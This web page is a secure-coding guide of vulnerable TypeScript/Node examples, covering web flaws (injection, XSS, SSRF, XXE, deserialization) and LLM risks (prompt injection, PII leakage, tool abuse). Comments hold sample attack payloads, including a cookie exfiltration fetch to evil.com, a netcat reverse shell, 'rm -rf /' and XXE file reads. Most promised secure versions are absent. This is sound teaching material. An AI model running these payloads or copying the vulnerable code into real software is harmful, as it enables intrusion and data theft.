Secure Code Examples
Learn from real-world vulnerable vs. secure code patterns. Copy secure implementations directly into your projects.
Prevent SQL injection by using parameterized queries instead of string concatenation.
// VULNERABLE - String concatenation
async function getUser(userId: string) {
const query = `SELECT * FROM users WHERE id = '${userId}'`;
const result = await db.query(query);
return result.rows[0];
}
// Attacker input: ' OR '1'='1' --
// Resulting query: SELECT * FROM users WHERE id = '' OR '1'='1' --'
Why This Matters
Parameterized queries separate SQL code from data, preventing attackers from injecting malicious SQL. ORMs provide an additional layer of protection by abstracting database queries.
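A secure counterpart to the block above can be sketched as follows. The `Db` interface is a stand-in for a node-postgres-style client and is an assumption of this sketch, not a real import:

```typescript
// Minimal sketch of the parameterized version.
interface Db {
  query(text: string, params: unknown[]): Promise<{ rows: any[] }>;
}

// SECURE - the user value travels as a bound parameter,
// never inside the SQL text itself
async function getUser(db: Db, userId: string) {
  const result = await db.query('SELECT * FROM users WHERE id = $1', [userId]);
  return result.rows[0];
}
```

Even the classic `' OR '1'='1' --` payload is harmless here: it arrives as a literal string value, not as SQL.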
Prevent XSS attacks by properly sanitizing and encoding user input.
// VULNERABLE - Directly inserting user content
function Comment({ content }: { content: string }) {
return (
<div dangerouslySetInnerHTML={{ __html: content }} />
);
}
// Attacker input: <script>document.cookie</script>
// or: <img src=x onerror="fetch('https://evil.com?c='+document.cookie)">
Why This Matters
React automatically escapes content rendered with JSX expressions. When HTML rendering is required, use a trusted sanitization library like DOMPurify to strip dangerous elements and attributes.
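The safe default is plain JSX interpolation (`<div>{content}</div>`), and DOMPurify when HTML rendering is genuinely required. As a dependency-free illustration of why escaping defuses the payloads above, here is a minimal encoder — a sketch only; DOMPurify remains the right tool for real HTML sanitization:

```typescript
// SECURE sketch - encode the five HTML-significant characters so user
// content can never break out into markup
function escapeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, '&amp;')   // must run first, before other entities are added
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
```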
Properly hash passwords using bcrypt instead of weak algorithms.
// VULNERABLE - Weak hashing
import crypto from 'crypto';
function hashPassword(password: string): string {
return crypto.createHash('md5').update(password).digest('hex');
}
// Problems:
// - MD5 is fast (millions of hashes/sec)
// - No salt (rainbow table attacks)
// - No key stretching
Why This Matters
Bcrypt is designed for password hashing with built-in salt generation and configurable work factor. The cost factor (salt rounds) makes brute-force attacks computationally expensive.
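The text recommends bcrypt; since that is a third-party package, this runnable sketch uses Node's built-in scrypt, which shares the key properties (a random per-password salt and a deliberately expensive derivation). Treat it as an illustration of the pattern, not a drop-in replacement for a bcrypt setup:

```typescript
import crypto from 'crypto';

// SECURE sketch - salted, slow key derivation via Node's built-in scrypt
function hashPassword(password: string): string {
  const salt = crypto.randomBytes(16);                  // unique per password
  const hash = crypto.scryptSync(password, salt, 64);   // memory-hard KDF
  return `${salt.toString('hex')}:${hash.toString('hex')}`;
}

function verifyPassword(password: string, stored: string): boolean {
  const [saltHex, hashHex] = stored.split(':');
  const candidate = crypto.scryptSync(password, Buffer.from(saltHex, 'hex'), 64);
  // constant-time comparison prevents timing attacks
  return crypto.timingSafeEqual(candidate, Buffer.from(hashHex, 'hex'));
}
```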
Protect against Cross-Site Request Forgery attacks with tokens and SameSite cookies.
// VULNERABLE - No CSRF protection
app.post('/api/transfer', async (req, res) => {
const { to, amount } = req.body;
// No verification that request originated from our app
await transferFunds(req.user.id, to, amount);
res.json({ success: true });
});
// Attacker's page:
// <form action="https://bank.com/api/transfer" method="POST">
// <input name="to" value="attacker" />
// <input name="amount" value="10000" />
// </form>
// <script>document.forms[0].submit()</script>
Why This Matters
CSRF tokens ensure that form submissions originate from your application. Combined with SameSite cookies, they provide robust protection against cross-site request forgery attacks.
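The token half of that defense can be sketched with Node's crypto module alone — generate a random per-session token, embed it in your forms, and compare in constant time on submission. (A real app would also set `SameSite=Lax` or `Strict` on the session cookie, and frameworks like csurf wrap this pattern for you.)

```typescript
import crypto from 'crypto';

// SECURE sketch - unguessable per-session token
function issueCsrfToken(): string {
  return crypto.randomBytes(32).toString('hex');
}

// compare the token stored in the session against the one submitted with the form
function verifyCsrfToken(sessionToken: string, submittedToken: string): boolean {
  const a = Buffer.from(sessionToken);
  const b = Buffer.from(submittedToken);
  // length guard: timingSafeEqual throws on unequal lengths
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}
```

The transfer route would then reject any POST whose submitted token does not verify against the session's token.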
Prevent directory traversal attacks when handling file paths.
Why This Matters
Always resolve file paths to their absolute form and verify they remain within the intended directory. Use path.basename() to strip directory components and check the resolved path prefix.
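That advice can be sketched directly with Node's path module. The upload directory below is an assumed example location; the essential move is the resolve-then-prefix check (`path.basename()` on the client-supplied name is a good additional layer):

```typescript
import path from 'path';

// assumed directory for the sketch
const UPLOAD_DIR = path.resolve('/var/app/uploads');

// SECURE sketch - resolve against the base directory, then confirm the
// result is still inside it; '../' sequences fail the prefix check
function resolveSafePath(userSupplied: string): string | null {
  const candidate = path.resolve(UPLOAD_DIR, userSupplied);
  return candidate.startsWith(UPLOAD_DIR + path.sep) ? candidate : null;
}
```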
Implement JWT tokens securely with proper validation, expiration, and storage.
// VULNERABLE - Poor JWT implementation
import jwt from 'jsonwebtoken';
// Using 'none' algorithm
const token = jwt.sign(payload, '', { algorithm: 'none' });
// Weak secret
const token2 = jwt.sign(payload, 'secret123');
// No expiration
const token3 = jwt.sign({ userId: '123' }, SECRET);
// Storing in localStorage (XSS vulnerable)
localStorage.setItem('token', token);
Why This Matters
Use strong secrets, explicit algorithms, short expiration times, and httpOnly cookies. Never use the 'none' algorithm and always validate the algorithm during verification.
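To make those checks concrete, here is a hand-rolled HS256 sketch showing the explicit algorithm check, expiration enforcement, and constant-time signature comparison. In real code you would use the jsonwebtoken library with `expiresIn` set and `algorithms: ['HS256']` pinned at verification — this version exists only to make the checks visible:

```typescript
import crypto from 'crypto';

const b64url = (buf: Buffer) => buf.toString('base64url');

function signToken(payload: object, secret: string, ttlSeconds: number): string {
  const header = { alg: 'HS256', typ: 'JWT' };
  const body = { ...payload, exp: Math.floor(Date.now() / 1000) + ttlSeconds };
  const data =
    b64url(Buffer.from(JSON.stringify(header))) + '.' +
    b64url(Buffer.from(JSON.stringify(body)));
  const sig = crypto.createHmac('sha256', secret).update(data).digest('base64url');
  return `${data}.${sig}`;
}

function verifyToken(token: string, secret: string): any {
  const [h, p, s] = token.split('.');
  if (!h || !p || !s) return null;
  // pin the algorithm: 'none' and anything unexpected is rejected outright
  if (JSON.parse(Buffer.from(h, 'base64url').toString()).alg !== 'HS256') return null;
  const expected = crypto.createHmac('sha256', secret).update(`${h}.${p}`).digest();
  const given = Buffer.from(s, 'base64url');
  if (expected.length !== given.length || !crypto.timingSafeEqual(expected, given)) return null;
  const payload = JSON.parse(Buffer.from(p, 'base64url').toString());
  // enforce expiration
  if (typeof payload.exp !== 'number' || payload.exp <= Math.floor(Date.now() / 1000)) return null;
  return payload;
}
```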
Prevent SSRF attacks where attackers abuse server functionality to access internal resources.
// VULNERABLE - No URL validation
app.post('/api/fetch-url', async (req, res) => {
const { url } = req.body;
// Attacker sends: http://169.254.169.254/latest/meta-data/
// or: http://localhost:6379/
const response = await fetch(url);
const data = await response.text();
res.json({ data });
});
// Attacker can:
// - Access AWS metadata (steal IAM credentials)
// - Scan internal network (port scanning)
// - Read internal services (Redis, Elasticsearch)
// - Access cloud provider APIs
Why This Matters
SSRF allows attackers to make the server perform requests to unintended locations. Validate URLs against an allowlist, block private/internal IPs, restrict protocols to HTTP/HTTPS, and disable redirects to prevent bypasses.
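A validation sketch covering the protocol and private-IP checks looks like this. The blocked ranges are the common RFC 1918 and link-local prefixes; a production check must also resolve the hostname and re-check the resulting IP (DNS rebinding can otherwise bypass string-level checks), and an allowlist is stronger still:

```typescript
// SECURE sketch - reject non-HTTP(S) schemes and obvious internal targets
function isSafeUrl(raw: string): boolean {
  let u: URL;
  try { u = new URL(raw); } catch { return false; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  const host = u.hostname;
  if (host === 'localhost' || host.includes(':')) return false;      // names + IPv6 literals
  if (/^(127\.|10\.|192\.168\.|169\.254\.|0\.)/.test(host)) return false; // loopback, private, metadata
  if (/^172\.(1[6-9]|2\d|3[01])\./.test(host)) return false;         // 172.16.0.0/12
  return true;
}
```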
Prevent unauthorized access to resources by properly checking object ownership and permissions.
// VULNERABLE - No authorization check
app.get('/api/invoices/:id', async (req, res) => {
const invoice = await Invoice.findById(req.params.id);
res.json(invoice);
});
// Attacker changes /api/invoices/123 to /api/invoices/456
// and gets another user's invoice data
app.delete('/api/users/:id', async (req, res) => {
await User.findByIdAndDelete(req.params.id);
res.json({ message: 'User deleted' });
});
// Any authenticated user can delete any other user!
Why This Matters
IDOR occurs when applications expose internal object references without authorization checks. Always verify resource ownership, use scoped queries that filter by the authenticated user, and enforce role-based access for sensitive operations.
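The scoped-query fix can be sketched like this; the `InvoiceStore` interface is a stand-in for whatever ORM you use (Mongoose, Prisma, etc.):

```typescript
interface Invoice { id: string; ownerId: string; total: number }

interface InvoiceStore {
  findOne(filter: { id: string; ownerId: string }): Promise<Invoice | null>;
}

// SECURE sketch - the lookup itself is scoped to the authenticated user,
// so guessing another user's id simply finds nothing
async function getInvoiceForUser(store: InvoiceStore, invoiceId: string, userId: string) {
  const invoice = await store.findOne({ id: invoiceId, ownerId: userId });
  // same response whether the invoice is missing or merely not owned
  if (!invoice) throw new Error('Not found');
  return invoice;
}
```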
Prevent command injection by avoiding shell execution with user-controlled input.
// VULNERABLE - User input in shell command
import { exec } from 'child_process';
app.post('/api/ping', (req, res) => {
const { host } = req.body;
exec(`ping -c 4 ${host}`, (error, stdout) => {
res.json({ output: stdout });
});
});
// Attacker input: "8.8.8.8; cat /etc/passwd"
// Attacker input: "8.8.8.8 && rm -rf /"
// Attacker input: "8.8.8.8 | nc attacker.com 4444 -e /bin/sh"
// VULNERABLE - Template literal in exec
app.post('/api/convert', (req, res) => {
const { filename } = req.body;
exec(`ffmpeg -i uploads/${filename} output.mp4`);
});
Why This Matters
Command injection occurs when user input is passed to shell commands. Use execFile() instead of exec() to avoid shell interpretation. Better yet, use native libraries instead of spawning system commands.
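The `execFile()` version of the ping endpoint looks like this: the host is validated against a strict character set, then passed as an argv element, so shell metacharacters like `;`, `|`, and `&&` are never interpreted. (Only the validator is exercised here; the ping call itself depends on the host system.)

```typescript
import { execFile } from 'child_process';

// allow only hostname/IP characters - no spaces, semicolons, pipes, etc.
function isValidHost(host: string): boolean {
  return host.length <= 253 && /^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$/.test(host);
}

// SECURE sketch - execFile passes arguments directly, without a shell
function ping(host: string, cb: (err: Error | null, output?: string) => void) {
  if (!isValidHost(host)) return cb(new Error('invalid host'));
  execFile('ping', ['-c', '4', host], (err, stdout) => cb(err, stdout));
}
```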
Prevent XXE attacks that exploit XML parsers to read files, perform SSRF, or cause denial of service.
// VULNERABLE - Default XML parser settings
import { parseString } from 'xml2js';
app.post('/api/parse-xml', (req, res) => {
// Default settings allow external entities
parseString(req.body, (err, result) => {
res.json(result);
});
});
// Malicious XML payload:
// <?xml version="1.0"?>
// <!DOCTYPE foo [
// <!ENTITY xxe SYSTEM "file:///etc/passwd">
// ]>
// <data>&xxe;</data>
//
// Billion Laughs DoS:
// <!ENTITY a "AAAA...">
// <!ENTITY b "&a;&a;&a;&a;&a;"> (exponential expansion)
Why This Matters
XXE attacks exploit XML parsers that process external entity references. Disable DTD processing and external entities, reject DOCTYPE declarations, limit input size, and prefer JSON or safe XML parsers.
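A pre-parse gate covering the size limit and DOCTYPE rejection can be sketched as below. This is one layer, not a complete defense — the parser itself should still be configured with DTD processing and external entities disabled (or replaced by a safe parser / JSON):

```typescript
// assumed cap for the sketch
const MAX_XML_BYTES = 1024 * 1024;

// SECURE sketch - refuse oversized input and any DOCTYPE/ENTITY declarations
// before the XML ever reaches a parser
function isSafeXmlInput(xml: string): boolean {
  if (Buffer.byteLength(xml, 'utf8') > MAX_XML_BYTES) return false;
  if (/<!DOCTYPE/i.test(xml) || /<!ENTITY/i.test(xml)) return false;
  return true;
}
```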
Prevent insecure deserialization attacks that can lead to remote code execution.
// VULNERABLE - Deserializing untrusted data
import { serialize, deserialize } from 'node-serialize';
app.post('/api/session', (req, res) => {
// Directly deserializing user-controlled cookie
const sessionData = deserialize(
Buffer.from(req.cookies.session, 'base64').toString()
);
res.json(sessionData);
});
// Attacker crafts:
// {"cmd":"_$$ND_FUNC$$_function(){require('child_process')
// .exec('rm -rf /')}()"}
// VULNERABLE - Using eval for JSON parsing
const data = eval('(' + userInput + ')');
// VULNERABLE - YAML deserialization
import yaml from 'js-yaml';
const config = yaml.load(userInput); // js-yaml < 4: could execute arbitrary code (v4 defaults to the safe schema)
Why This Matters
Never deserialize untrusted data with libraries that can execute code. Use JSON.parse for deserialization, validate with schema libraries like Zod, use safe YAML loading, and sign data to detect tampering.
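The JSON.parse-plus-validation pattern for the session cookie looks like this. The inline shape check stands in for a schema library like Zod, which does the same job more thoroughly; signing the cookie (e.g. HMAC) would additionally detect tampering:

```typescript
// SECURE sketch - JSON.parse cannot execute code, and the explicit shape
// check rejects anything that isn't exactly the session we expect
function parseSession(raw: string): { userId: string } | null {
  let data: unknown;
  try {
    data = JSON.parse(Buffer.from(raw, 'base64').toString('utf8'));
  } catch {
    return null;
  }
  if (typeof data !== 'object' || data === null) return null;
  const userId = (data as Record<string, unknown>).userId;
  if (typeof userId !== 'string') return null;
  return { userId };
}
```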
Implement essential HTTP security headers to protect against common web attacks.
// VULNERABLE - No security headers
// Default Next.js config with no headers
const nextConfig = {};
// No Content-Security-Policy = XSS risk
// No X-Frame-Options = Clickjacking risk
// No Strict-Transport-Security = Downgrade attacks
// No X-Content-Type-Options = MIME sniffing
// No Referrer-Policy = Information leakage
// No Permissions-Policy = Feature abuse
// Response headers:
// HTTP/1.1 200 OK
// Content-Type: text/html
// (No security headers at all)
Why This Matters
Security headers provide defense-in-depth against XSS, clickjacking, MIME sniffing, protocol downgrade, and other attacks. Always configure CSP, HSTS, X-Frame-Options, and Referrer-Policy in production.
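A hardened Next.js-style config can be sketched as below. The values are sensible starting points rather than a universal policy — CSP in particular almost always needs per-application tuning before it can be this strict:

```typescript
// SECURE sketch - apply a baseline header set to every route
const securityHeaders = [
  { key: 'Content-Security-Policy', value: "default-src 'self'" },
  { key: 'Strict-Transport-Security', value: 'max-age=63072000; includeSubDomains; preload' },
  { key: 'X-Frame-Options', value: 'DENY' },
  { key: 'X-Content-Type-Options', value: 'nosniff' },
  { key: 'Referrer-Policy', value: 'strict-origin-when-cross-origin' },
  { key: 'Permissions-Policy', value: 'camera=(), microphone=(), geolocation=()' },
];

const nextConfig = {
  async headers() {
    return [{ source: '/(.*)', headers: securityHeaders }];
  },
};
```

In a real project this object would be exported from `next.config.js`.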
Implement rate limiting to prevent brute force attacks, credential stuffing, and API abuse.
Why This Matters
Rate limiting prevents brute force attacks, credential stuffing, and API abuse. Use tiered limits (stricter for auth), account lockout after failures, and Redis-backed stores for distributed systems. Never reveal whether an email exists.
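The core mechanism can be sketched as an in-memory sliding-window limiter. This single-process version illustrates the logic only; as noted above, distributed deployments need a shared store such as Redis, and auth endpoints should get stricter limits than general API routes:

```typescript
// SECURE sketch - sliding-window limiter keyed by user/IP
class RateLimiter {
  private hits = new Map<string, number[]>();
  constructor(private limit: number, private windowMs: number) {}

  // returns true if the request is allowed; `now` is injectable for testing
  allow(key: string, now = Date.now()): boolean {
    const recent = (this.hits.get(key) ?? []).filter(t => now - t < this.windowMs);
    if (recent.length >= this.limit) {
      this.hits.set(key, recent);
      return false; // over the limit for this window
    }
    recent.push(now);
    this.hits.set(key, recent);
    return true;
  }
}
```

A login route would call `allow(ip)` (or `allow(email)`) before even checking credentials, e.g. with a limit like 5 attempts per 15 minutes.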
Prevent open redirect attacks where attackers abuse URL redirect parameters for phishing.
// VULNERABLE - Unvalidated redirect
app.get('/redirect', (req, res) => {
const { url } = req.query;
// Attacker: /redirect?url=https://evil-phishing.com/login
res.redirect(url as string);
});
// In frontend:
function LoginRedirect() {
const params = new URLSearchParams(window.location.search);
const redirectTo = params.get('redirect') || '/';
// After login, redirects to attacker's site
window.location.href = redirectTo;
}
// Common exploitation:
// /login?redirect=https://evil.com/fake-login
// /auth/callback?next=//evil.com
// /redirect?url=javascript:alert(document.cookie)
Why This Matters
Open redirect vulnerabilities allow attackers to redirect users to malicious sites using legitimate URLs. Validate redirect URLs against an allowlist, only permit relative paths, and block protocol-relative URLs (//).
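The relative-path validation described above fits in a few lines. Anything that is not a plain same-origin path — absolute URLs, `javascript:` URIs, protocol-relative `//` targets, and the backslash variant browsers normalize to `//` — falls back to a safe default:

```typescript
// SECURE sketch - only same-origin relative paths survive; everything else
// collapses to '/'
function safeRedirect(target: string | null): string {
  if (!target) return '/';
  if (!target.startsWith('/')) return '/';                      // blocks https://, javascript:, etc.
  if (target.startsWith('//') || target.startsWith('/\\')) return '/'; // protocol-relative tricks
  return target;
}
```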
Prevent attackers from modifying unauthorized fields by controlling which properties can be updated.
// VULNERABLE - Spreading all request body fields
app.put('/api/profile', async (req, res) => {
// User sends: { name: "John", role: "admin", verified: true }
await User.findByIdAndUpdate(req.user.id, req.body);
res.json({ message: 'Profile updated' });
});
// Mongoose/Prisma: updating with unfiltered input
app.post('/api/register', async (req, res) => {
const user = new User(req.body);
// Attacker adds: { isAdmin: true, subscriptionTier: "enterprise" }
await user.save();
res.json(user);
});
// GraphQL mutation with spread
const resolvers = {
Mutation: {
updateUser: (_, args) => User.update({ ...args }),
},
};
Why This Matters
Mass assignment occurs when an API blindly accepts all user-submitted fields for database operations. Use explicit allow-lists or schema validation (Zod, Joi) to control exactly which fields can be modified by each endpoint.
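An explicit allow-list can be sketched as below (the field names are illustrative for a profile endpoint; a Zod or Joi schema achieves the same effect with richer validation):

```typescript
// fields this endpoint is allowed to touch - role, verified, isAdmin, etc.
// simply do not appear here
const PROFILE_FIELDS = ['name', 'bio', 'avatarUrl'] as const;

// SECURE sketch - copy only allow-listed fields out of the request body
function pickProfileUpdates(body: Record<string, unknown>): Record<string, unknown> {
  const updates: Record<string, unknown> = {};
  for (const field of PROFILE_FIELDS) {
    if (field in body) updates[field] = body[field];
  }
  return updates;
}
```

The update route then passes `pickProfileUpdates(req.body)` — never `req.body` itself — to the ORM.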
Protect sensitive data in transit, at rest, in logs, and in API responses.
// VULNERABLE - Exposing sensitive data in API response
app.get('/api/users/:id', async (req, res) => {
const user = await User.findById(req.params.id);
// Returns password hash, SSN, internal IDs, etc.
res.json(user);
});
// VULNERABLE - Logging sensitive data
console.log('Login attempt:', { email, password });
console.log('Payment:', { cardNumber, cvv, amount });
// VULNERABLE - Sensitive data in URL
// Example request: GET /api/reset-password?token=abc123&email=user@example.com
// Tokens visible in browser history, server logs, referrer headers
// VULNERABLE - Error messages reveal internals
app.use((err, req, res, next) => {
res.status(500).json({
error: err.message,
stack: err.stack, // Reveals file paths, line numbers
query: err.query, // Reveals database queries
});
});
Why This Matters
Never expose internal data in API responses, logs, URLs, or error messages. Use DTO patterns to explicitly select response fields, redact sensitive data from logs, and return generic error messages to clients.
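The DTO pattern for the user endpoint can be sketched like this; the `UserRecord` fields are illustrative. The point is structural: the response is built from an explicit allow-list, so a new sensitive column added to the model later cannot leak by default:

```typescript
interface UserRecord {
  id: string;
  name: string;
  email: string;
  passwordHash: string; // must never leave the server
  ssn: string;          // must never leave the server
}

// SECURE sketch - the response can only ever contain what is listed here
function toPublicUser(user: UserRecord) {
  return { id: user.id, name: user.name, email: user.email };
}
```

The route then returns `res.json(toPublicUser(user))` instead of the raw model.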
Secure session management with proper cookie settings, session fixation prevention, and token rotation.
// VULNERABLE - Weak session management
import session from 'express-session';
app.use(session({
secret: 'keyboard-cat', // Weak, hardcoded secret
resave: true,
saveUninitialized: true, // Creates session for every visitor
cookie: {
// No secure flag — sent over HTTP
// No httpOnly — accessible via JavaScript
// No maxAge — session never expires
// No sameSite — CSRF vulnerable
}
}));
// Session fixation — no regeneration after login
app.post('/login', async (req, res) => {
const user = await authenticate(req.body);
if (user) {
req.session.userId = user.id; // Same session ID reused
res.json({ success: true });
}
});
Why This Matters
Use strong secrets, secure cookie flags, session regeneration after login, absolute timeouts, and server-side session stores. The __Host- cookie prefix provides additional security guarantees in modern browsers.
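Framework-free, the essentials can be sketched as below: a CSPRNG session ID, the hardened cookie attributes, and rotation at login (in express-session this is `req.session.regenerate()`). Names and the 30-minute cap are illustrative:

```typescript
import crypto from 'crypto';

// unguessable session identifier
function newSessionId(): string {
  return crypto.randomBytes(32).toString('base64url');
}

// SECURE sketch - all the cookie attributes the vulnerable config omitted
function sessionCookie(sessionId: string): string {
  return [
    `__Host-sid=${sessionId}`, // __Host- prefix requires Secure, Path=/, no Domain
    'Path=/',
    'Secure',        // HTTPS only
    'HttpOnly',      // unreadable from JavaScript
    'SameSite=Lax',  // CSRF mitigation
    'Max-Age=1800',  // 30-minute cap
  ].join('; ');
}

// on successful login, discard the pre-login id (session fixation defense)
function rotateSession(_oldId: string): string {
  return newSessionId();
}
```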
Use strong, modern cryptographic algorithms instead of broken or weak ones.
// VULNERABLE - Weak cryptography
import crypto from 'crypto';
// Using deprecated/broken algorithms
const hash = crypto.createHash('md5').update(data).digest('hex');
const hash2 = crypto.createHash('sha1').update(data).digest('hex');
// ECB mode — reveals patterns in encrypted data
const cipher = crypto.createCipheriv('aes-128-ecb', key, null);
// Hardcoded encryption key
const ENCRYPTION_KEY = 'mySecretKey12345';
// Using Math.random for security-sensitive operations
const resetToken = Math.random().toString(36).substring(2);
const otp = Math.floor(Math.random() * 999999);
// Insecure key derivation
const key = crypto.createHash('sha256')
.update(password).digest();
Why This Matters
Use SHA-256+ for hashing, AES-256-GCM for encryption (provides confidentiality + integrity), crypto.randomBytes for random values, and PBKDF2/scrypt for key derivation. Never use MD5, SHA1, ECB mode, Math.random, or hardcoded keys.
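The AES-256-GCM and CSPRNG halves of that advice can be sketched with Node's crypto module. Key management (environment variables, a KMS) is out of scope here; the key below is generated inline purely for the sketch:

```typescript
import crypto from 'crypto';

// SECURE sketch - authenticated encryption with a fresh random IV per message
function encrypt(plaintext: string, key: Buffer) {
  const iv = crypto.randomBytes(12); // 96-bit IV, never reused with the same key
  const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);
  const ciphertext = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);
  return { iv, ciphertext, tag: cipher.getAuthTag() };
}

function decrypt(box: { iv: Buffer; ciphertext: Buffer; tag: Buffer }, key: Buffer): string {
  const decipher = crypto.createDecipheriv('aes-256-gcm', key, box.iv);
  decipher.setAuthTag(box.tag); // GCM authentication: tampering makes final() throw
  return Buffer.concat([decipher.update(box.ciphertext), decipher.final()]).toString('utf8');
}

// CSPRNG for tokens - never Math.random
const resetToken = crypto.randomBytes(32).toString('hex');
```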
Prevent prototype pollution attacks that modify JavaScript object prototypes to inject malicious properties.
// VULNERABLE - Deep merge without sanitization
function deepMerge(target: any, source: any): any {
for (const key in source) {
if (typeof source[key] === 'object' && source[key] !== null) {
target[key] = target[key] || {};
deepMerge(target[key], source[key]);
} else {
target[key] = source[key];
}
}
return target;
}
// Attacker sends:
// { "__proto__": { "isAdmin": true } }
const userConfig = deepMerge({}, req.body);
// Now ALL objects have isAdmin = true!
// Vulnerable query string parsing:
// ?__proto__[isAdmin]=true
// or: ?constructor[prototype][isAdmin]=true
// Check later in code:
if (user.isAdmin) { /* Attacker gains admin access */ }
Why This Matters
Prototype pollution occurs when attackers inject properties into Object.prototype via __proto__ or constructor.prototype. Filter dangerous keys, use Object.create(null), prefer Map over objects, and validate input with strict schemas.
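The same deep merge becomes safe once the pollution vectors are filtered and new branches are created without a prototype:

```typescript
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// SECURE sketch - identical merge logic, but __proto__ / constructor /
// prototype keys are dropped and nested targets have no prototype to pollute
function safeDeepMerge(target: Record<string, any>, source: Record<string, any>) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (typeof target[key] !== 'object' || target[key] === null) {
        target[key] = Object.create(null); // prototype-less container
      }
      safeDeepMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}
```

Note that the malicious key must come from `JSON.parse` (as `req.body` does) for the attack to work at all — JSON.parse creates `__proto__` as an own key, which is exactly what the filter above drops.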
Securely handle file uploads to prevent malicious file execution, path traversal, and storage abuse.
// VULNERABLE - Unrestricted file upload
import multer from 'multer';
const upload = multer({ dest: 'public/uploads/' });
app.post('/upload', upload.single('file'), (req, res) => {
// No file type validation
// No file size limit
// Stored in publicly accessible directory
// Original filename used (path traversal risk)
const filePath = `public/uploads/${req.file.originalname}`;
fs.renameSync(req.file.path, filePath);
res.json({ url: `/uploads/${req.file.originalname}` });
});
// Attacker uploads:
// - webshell.php → Remote code execution
// - ../../../etc/cron.d/backdoor → Path traversal
// - bomb.zip (42 bytes → 4.5 PB) → Zip bomb DoS
// - malware.exe.jpg → Executable disguised as image
Why This Matters
Validate file types using magic bytes (not extensions), limit file size, generate random filenames, store outside the public directory, and serve files through authenticated routes. Never trust client-provided filenames or MIME types.
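The magic-byte check and server-generated filename can be sketched as below (two signatures shown for illustration; real handlers cover more types and also enforce size limits and store outside the web root):

```typescript
import crypto from 'crypto';

// leading bytes of known-good image formats
const MAGIC: Array<{ ext: string; bytes: number[] }> = [
  { ext: '.png', bytes: [0x89, 0x50, 0x4e, 0x47] },
  { ext: '.jpg', bytes: [0xff, 0xd8, 0xff] },
];

// SECURE sketch - identify the file by content, not by extension or MIME header
function detectImageExt(buf: Buffer): string | null {
  const hit = MAGIC.find(m => m.bytes.every((b, i) => buf[i] === b));
  return hit ? hit.ext : null;
}

// reject unknown content; never reuse the client's filename
function storedFileName(buf: Buffer): string | null {
  const ext = detectImageExt(buf);
  if (!ext) return null;
  return crypto.randomBytes(16).toString('hex') + ext;
}
```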
Prevent prompt injection attacks where user input overrides LLM system instructions.
Why This Matters
Defend against prompt injection using multiple layers: (1) regex-based input scanning for known injection patterns, (2) separate system/user message roles instead of string concatenation, (3) strict system prompt rules with explicit refusal instructions, (4) output validation to catch leaked sensitive content, (5) rate limiting per user, and (6) security event logging. No single defense is sufficient — always layer multiple controls.
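Layer (1), the input scanner, can be sketched as below. The patterns are illustrative, not exhaustive — a determined attacker can rephrase around any fixed list, which is exactly why this is only one layer among the six above:

```typescript
// illustrative subset of known injection phrasings
const INJECTION_PATTERNS: RegExp[] = [
  /ignore (all |previous |prior )*(instructions|prompts)/i,
  /disregard (the )?(system|previous) (prompt|instructions)/i,
  /you are now/i,
  /reveal .*system prompt/i,
];

// SECURE sketch - flag suspicious input before it reaches the model
function looksLikeInjection(userInput: string): boolean {
  return INJECTION_PATTERNS.some(p => p.test(userInput));
}
```

A flagged message would be rejected (or routed for review and logged as a security event) rather than sent to the model.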
Prevent personally identifiable information from leaking through LLM prompts or responses.
// VULNERABLE: User data sent directly to LLM with no redaction
async function summarizeCustomerTicket(ticket: CustomerTicket) {
const prompt = `Summarize this support ticket:
Name: ${ticket.customerName}
Email: ${ticket.email}
Phone: ${ticket.phone}
SSN: ${ticket.ssn}
Message: ${ticket.message}`;
// PII goes straight to the model API — stored in logs,
// potentially used in training, visible to API provider
const response = await openai.chat.completions.create({
model: "gpt-4",
messages: [{ role: "user", content: prompt }],
});
return response.choices[0].message.content;
}
Why This Matters
Never send raw PII to LLM APIs. Use regex-based detection to redact sensitive data (SSN, email, phone, credit cards) before the API call. For fields like SSN, don't include them at all. After the LLM responds, scan the output for any PII that may have leaked. Store a mapping table only in memory for the request lifecycle — never log PII. This approach prevents data exposure through API provider logs, model training, and response leakage.
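The redaction step can be sketched with a few regexes. The patterns below cover an illustrative subset (SSN, email, US-style phone); real deployments add more patterns and, for fields like SSN, omit the data entirely rather than redacting it:

```typescript
// SECURE sketch - replace PII with placeholder tags before the prompt is built
const PII_PATTERNS: Array<[RegExp, string]> = [
  [/\b\d{3}-\d{2}-\d{4}\b/g, '[SSN]'],
  [/\b[\w.+-]+@[\w-]+\.[\w.]+\b/g, '[EMAIL]'],
  [/\b\d{3}[-.\s]?\d{3}[-.\s]?\d{4}\b/g, '[PHONE]'],
];

function redactPii(text: string): string {
  return PII_PATTERNS.reduce((t, [pattern, tag]) => t.replace(pattern, tag), text);
}
```

`summarizeCustomerTicket` would then send `redactPii(ticket.message)` (and no SSN field at all) to the model, and run the model's response through the same scan before returning it.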
Prevent excessive agency attacks where LLMs abuse tool/function calling to perform unauthorized actions.
// VULNERABLE: LLM has unrestricted tool access
const tools = [
{
type: "function",
function: {
name: "execute_sql",
description: "Execute any SQL query",
parameters: { type: "object", properties: { query: { type: "string" } } },
},
},
{
type: "function",
function: {
name: "send_email",
description: "Send an email to anyone",
parameters: {
type: "object",
properties: {
to: { type: "string" },
subject: { type: "string" },
body: { type: "string" },
},
},
},
},
];
// No validation — LLM can run any SQL, email anyone
async function handleToolCall(toolCall: any) {
if (toolCall.function.name === "execute_sql") {
const args = JSON.parse(toolCall.function.arguments);
return await db.query(args.query); // SQL injection + unrestricted access!
}
if (toolCall.function.name === "send_email") {
const args = JSON.parse(toolCall.function.arguments);
return await sendEmail(args.to, args.subject, args.body); // Spam/phishing!
}
}
Why This Matters
